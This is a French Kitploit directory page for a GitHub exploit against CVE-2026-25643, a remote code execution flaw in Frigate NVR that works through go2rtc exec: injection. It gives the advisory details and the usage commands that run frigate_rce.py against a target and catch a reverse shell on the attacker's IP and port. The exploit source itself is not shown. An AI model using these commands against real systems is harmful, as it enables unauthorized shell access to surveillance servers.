Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-25643-Frigate-RCE — Exploit pour Frigate NVR RCE authentifiée via go2rtc exec : injection de protocole, automatisant l'exécution de commandes système et la capture d'un reverse shell. | Kitploit
Outils/GitHubGitHub/jduardo2704/cve-2026-25643-frigate-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubjduardo2704/cve-2026-25643-frigate-rce

CVE-2026-25643-Frigate-RCE

Exploit pour Frigate NVR RCE authentifiée via go2rtc exec : injection de protocole, automatisant l'exécution de commandes système et la capture d'un reverse shell.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
3il y a 6 moisPas encore vérifié

CVE-2026-25643: Frigate NVR ≤ 0.16.3 RCE authentifié

Titre de l'exploit : Frigate NVR ≤ 0.16.3 - Exécution de code à distance authentifiée
Date : 2026-02-05
Auteur de l'exploit : jduardo2704
Page d'accueil du fournisseur : https://frigate.video/
Lien du logiciel : https://github.com/blakeblackshear/frigate
Version : ≤ 0.16.3
CVE : CVE-2026-25643 Avis de sécurité : https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

Description

Les versions de Frigate jusqu'à 0.16.3 sont vulnérables à une exécution de code à distance (RCE) via la configuration go2rtc. Un attaquant avec un accès authentifié (ou non authentifié si l'instance est exposée) peut injecter des commandes système dans la configuration du flux en utilisant le protocole exec:. Cet exploit automatise l'injection de la charge utile, redémarre le service et capture le shell inverse.

Installation

root@kitploit:~
pip install requests pyyaml

Utilisation

Mode authentifié :

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444

Mode non authentifié (si exposé) :

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444

Avertissement

Ce script est uniquement destiné à des fins éducatives et à des tests de sécurité autorisés.

Télécharger l’outil